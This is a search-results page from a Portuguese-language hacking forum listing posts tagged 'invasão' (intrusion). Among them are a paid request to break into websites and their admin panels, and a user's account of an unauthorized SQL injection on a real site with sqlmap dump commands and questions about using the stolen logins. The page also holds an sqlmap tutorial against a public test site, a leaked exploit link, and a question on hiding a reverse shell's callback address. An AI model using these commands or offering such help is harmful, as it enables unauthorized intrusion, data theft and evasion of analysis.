Jump to content

Search the Community

Showing results for tags 'invasão'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Fsociety Brasil
    • Administration
    • Sugestões
    • Apresentação de Membros
  • Desenvolvimento
    • Ferramentas
    • Projetos
    • Programação
  • Segurança da Informação
    • Hacker
    • Cracker
    • Leaks
    • Engenharia Social
    • CTF
    • Bug Bounty
  • Sistemas Operacionais (S.O)
    • Linux
    • Windows
    • Mac
  • Hardware
    • Tutoriais e Ferramentas
    • Dúvidas e discussões
    • Arduino
    • Raspberry
  • Off-Topic
    • BioHacking
    • Games, Emuladores, Crack, Cheater e afins
    • Cursos, apostilas e livros
    • Ciência, Tecnologia, Sociologia, Filosofia e Psicologia
    • Notícias, novidades, acontecimentos e teorias da conspiração
    • Design
    • Random, dúvidas e discussões

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Location


Sex

Found 11 results

  1. Neste video fui desafiado a resolver uma ctf do hack the box, mostrei de forma simples como fiz para resolver e dar alguns alertas sobre as falhas espero que possa ajudar em algo https://vimeo.com/329670178
  2. Procuro profissional que esteja interessado em ganhar um extra preciso de invasão de alguns sites e o cpanel dele adm etc pago pelo serviço
  3. Hello friends, Então... o que tenho pra hoje é um curso de Wireless Security - Invasão de Redes Wireless. Um excelente curso, na minha opinião. Espero que gostem! -- DOWNLOAD -- http://tmearn.com/WirelessSecurity -- SCAN URL PELO VIRUS TOTAL -- https://www.virustotal.com/#/url/c3b...ac18/detection Have fun!! __________________ -- Hack The Planet
  4. um simples video para quem e iniciante e tem duvidas sobre ataques em rede externa. como acontece e como abrir as portas
  5. Quando se consegue o IP de alguém via internet(Ex: Meu IP), esse IP é aquele que serve para uma invasão?? Ex: quando entramos em alguns sites eles mostram um alerta parecido com esse: "Detectámos que estás a usar o IP 186.89.175.6 e que estás em (ou perto) no país Brazil. Se nós conseguimos saber isto, os outros sites por onde andas também conseguem" Mas todos sabemos que quando pegamos o IP de alguém, esse tal IP e semelhante a este do alerta, mas o IP que esta configurado manualmente na placa/adaptador de rede wireless da vitima é diferente desses conseguimos pegar pela internet. O "X" da minha questão é o seguinte: esse IP que conseguimos pegar pela internet, é o IP que serve para uma invasão? Ou a invasão só acontece se tivermos o IP que esta configurado manualmente na placa/adaptador de rede wireless da vitima? Resumo do PC alvo(Um notebook meu que esta conectado em uma rede Wi-Fi que não é minha) OBS: Meu PC para invadir o alvo esta conectado em uma rede minha, Mas meu notebook esta conectado em uma rede que não me pertence. Notebook no site, Meu IP, mostra um certo número de IP(O provedor o site conseguiu identificar corretamente) Notebook em, configurações do TCP/IP, Mostra o IP configurado manualmente por mim Notebook no software, Ralink Wireless Lan Card, mostra o IP configurado manualmente por mim no TCP/IP
  6. Exploit vazado da equipe de hacker @Yunkers Crew Exploit: https://github.com/2inf3rnal/foxcontact/ Video demostrativo do exploit https://www.youtube.com/watch?v=Z5HoCq4th7g Font: Yunkers Crew
  7. Salve Hackers Men!!! Eu consegui invadir um site com sql injection e tanto no Havijj quanto no sqlmap ta rolando algo que até agora não tinha acontecido comigo, logo eu não sei resolver. Então vou tentar detalhar o máximo aqui para conseguir uma ajuda de vcs! Desde já agradeço O que rolou foi o seguinte: Consegui sucesso em encontrar 2 bancos de dados através do modo GET pelo sqlmap através do seguinte comando sqlmap -u http://www.sigilo.com.br/sigilo.php?estado= --dbs --level 5 --risk 3 Depois foi dando uns erros e o sqlmap foi sugerindo os parâmetros: http://www.sigilo.com.br/sigilo.php?estado= --dbs --level 5 --risk 3 --dbms mysql --time-sec 15 --no-cast --threads 10 e eu consegui os dois bancos de dados com esse comando sqlmap -u http://www.sigilo.com.br/sigilo.php?estado= -D sigilo-dados -T sigilo_app --dump --time-sec 15 --no-cast --random-agent --threads 10 Todas vezes que eu fiz ataque de sql injection o comando http://www.sigilo.com.br/sigilo.php?estado= –dbs é suficiente, mas nesse site já começou a ficar estranho desde essa parte onde foi dando erros e eu tendo que ir colocando as sugestões nos comandos até por fim consegui explorar o 2 bancos de dados. O maior problema é que o quando eu vou fazer o Dump de qualquer dado ele fica tentando fazer uma espécie de brute force para descobrir o nome do dado e isso demora, como são muitos dados mesmo deixando o pc ligado 2 dias ele não conseguiu pegar tudo e meu pc é até descente. Então o que eu gostaria de saber é o seguinte: porque isso está acontecendo em vez de ficar tentando descobrir letra por letra seja do banco de dados ou de qualquer dado pra só assim fazer o dump? Outra coisa seria uma forma de dar dump de forma mais rápida ou pelo menos uma que seja viável. Abaixo segue um print para vocês terem noção melhor do problema. 2-Pergunta: Aproveitando o gancho para não precisar fazer outro post eu gostaria de saber se todo site tem uma página de admin? Pq eu consegui os dados de usuários e senha porém o site só tem uma página para cadastro e não tem pagina de admin ou qualquer outra pra logar e eu tenho certeza disso pq eu já pesquisei de toda forma imaginável. Com isso a pergunta é: O que vcs acham que é esses usuários? Porque que eu sei que são dados uteis por causa dos e-mails que são de parceiros e do dono do site, só que com outros domínios. Logo esses dados tem que servirem para logar em algum lugar e que lugar seria esse? Hackers men eu estou meio chapado então relevem os erros ai e se precisarem de mais informações é só perguntarem que eu esclareço. Obrigado!
  8. Tipos de ataques virtuais efetuados por crackers. Pasta para download com 58 arquivos .TXT com diversos tipos de ataques e explicações sobre o mesmo (O arquivo vai estar como RAR, extraia e dentro vai estar a pasta "Tipos de ataques" com os itens dentro). Tipos de Ataque.rar
  9. SQL Injection método POST com o SQLmap E ai pessoal, hoje trago para vocês um tutorial ensinando a explorar o SQL injection no método POST através do SQLmap. Não é aquele método de bypass, ok? Nesse tipo de SQLi POST, a gente executa comandos SQL através dos formulários (Ok, é quase a mesma coisa) só que este método é mais eficiente. A partir dele a gente consegue pegar as informações do banco de dados como pelo método GET, só que através de formulários. Então vamos lá, eu tenho aqui um site para testes (O mesmo usado na aula anterior), que é o do Acunetix. A página de formulário com a vulnerabilidade é a "/userinfo.php" Então vamos ao tutorial. Primeiramente tu vai precisar baixar o SQLmap. Agora, vamos descompactar, e ir até a pasta pelo Terminal/CMD Enfim, isso vocês ja sabem fazer rs Agora vamos digitar o seguinte comando: python sqlmap.py -u http://testphp.vulnweb.com/userinfo.php --dbs --forms Com esta sintaxe, o sqlmap irá executar e testará os payloads. Ai você irá lendo as opções que irem aparecendo, e digitar o Y ou N. Logo após isto, digite: python sqlmap.py -u http://testphp.vulnweb.com/userinfo.php -D acuart --tables --forms A partir disso, ja temos a certeza de que o site é vulnerável. Com isso iremos extrair as colunas do banco de dados "Acuart" através de formulários. Após as tabelas aparecerem, digite: python sqlmap.py -u http://testphp.vulnweb.com/userinfo.php -D acuart -T users --columns --forms Com isso, ja que tivemos acesso ao nome anterior das tabelas, com esse comando vamos extrair as colunas das tabelas. Após aparecer as colunas, chegamos ao fim, vamos dumpar tudo: python sqlmap.py -u http://testphp.vulnweb.com/userinfo.php -D acuart -T users -C email,pass --forms --dump Pronto! Resumindo oque foi feito, o SQLmap, fez uma requisição ao site e através do método POST ele fez a injeção de comandos do SQL a fim de conseguir oque a gente quisesse do banco de dados. Ilustrações:
  10. Olá! Minha dúvida é o seguinte, quando se cria um arquivo para conexão reversa é possível descobrir o endereço de onde ele vai se conectar através de uma engenharia reversa, correto? De que forma isso é possível? E como posso dificultar, ou até mesmo evitar esse processo?
  11. Já imaginou o que fazer após invadir um computador?
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.